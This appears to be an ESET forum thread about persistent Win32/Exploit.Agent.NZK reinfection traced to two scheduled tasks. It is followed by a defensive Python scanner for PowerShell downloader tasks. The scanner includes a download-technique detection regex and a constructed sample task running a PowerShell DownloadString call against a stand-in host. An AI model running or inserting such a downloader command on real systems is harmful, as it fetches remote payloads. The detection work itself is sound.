Hi ESET Team,

One of our client servers has been infected by the malware Win32/Exploit.Agent.NZK. ESET is able to detect and clean the malware, but the malware keeps attacking the servers.

Please find below a link to download the log from ESET Log Collector and the output file from wmic process list:

https://drive.google.com/open?id=1jU8ME89_udwQAtsLf-ZP3UgWFEO48ad8.

 

Any suggestions on how to stop this malware?

  • Administrators

Please move the following files to a new folder, then reboot the machine. Those are two tasks that trigger PowerShell to download a resource from blocked URLs:

c:\windows\system32\tasks\Sync
c:\windows\system32\tasks\Winnet

Please submit the two files to samples[at]eset.com in an archive encrypted with the password "infected".

This topic is now closed to further replies.
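
The administrator's reply above identifies two scheduled-task files that launch PowerShell to download a resource. As an added example (not code from the thread or from ESET), this Python script checks task definition files copied from c:\windows\system32\tasks for that pattern; the marker list, function names and sample tasks are assumptions constructed here.

```python
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Heuristic download markers (an assumption of this example; extend as needed).
DOWNLOAD = re.compile(
    r"https?://|downloadstring|downloadfile|net\.webclient|invoke-webrequest|start-bitstransfer",
    re.IGNORECASE)

def suspicious_actions(task_xml: bytes):
    """Return (command, arguments) for each Exec action that runs PowerShell with a download marker."""
    root = ET.fromstring(task_xml)  # task files are UTF-16 XML; expat honours the BOM
    hits = []
    for ex in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", "", NS) or "").strip()
        args = (ex.findtext("t:Arguments", "", NS) or "").strip()
        # PowerShell may be the command itself or be launched through cmd.exe /c
        if "powershell" in f"{cmd} {args}".lower() and DOWNLOAD.search(args):
            hits.append((cmd, args))
    return hits

def scan_tasks(folder):
    """Scan every file under a copied Tasks folder; return {path: hits}."""
    report = {}
    for path in sorted(Path(folder).rglob("*")):
        if not path.is_file():
            continue
        try:
            hits = suspicious_actions(path.read_bytes())
        except ET.ParseError:
            continue  # not a task definition
        if hits:
            report[str(path)] = hits
    return report

# Constructed samples (not taken from the thread): one downloader task, one benign task.
_TASK = ('<?xml version="1.0" encoding="UTF-16"?>'
         '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
         '<Actions Context="Author"><Exec><Command>{cmd}</Command>'
         '<Arguments>{args}</Arguments></Exec></Actions></Task>')
SAMPLE_BAD = _TASK.format(cmd="powershell.exe",
    args="-Command (New-Object Net.WebClient).DownloadString('http://blocked.example/x')").encode("utf-16")
SAMPLE_OK = _TASK.format(cmd=r"%windir%\system32\defrag.exe", args="-c -h -o").encode("utf-16")

if __name__ == "__main__":
    for task, hits in scan_tasks(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(task, hits)
```

Run it against a copy of the Tasks folder (for example the folder the flagged files were moved into) and review each reported command line by hand, since the markers are heuristics.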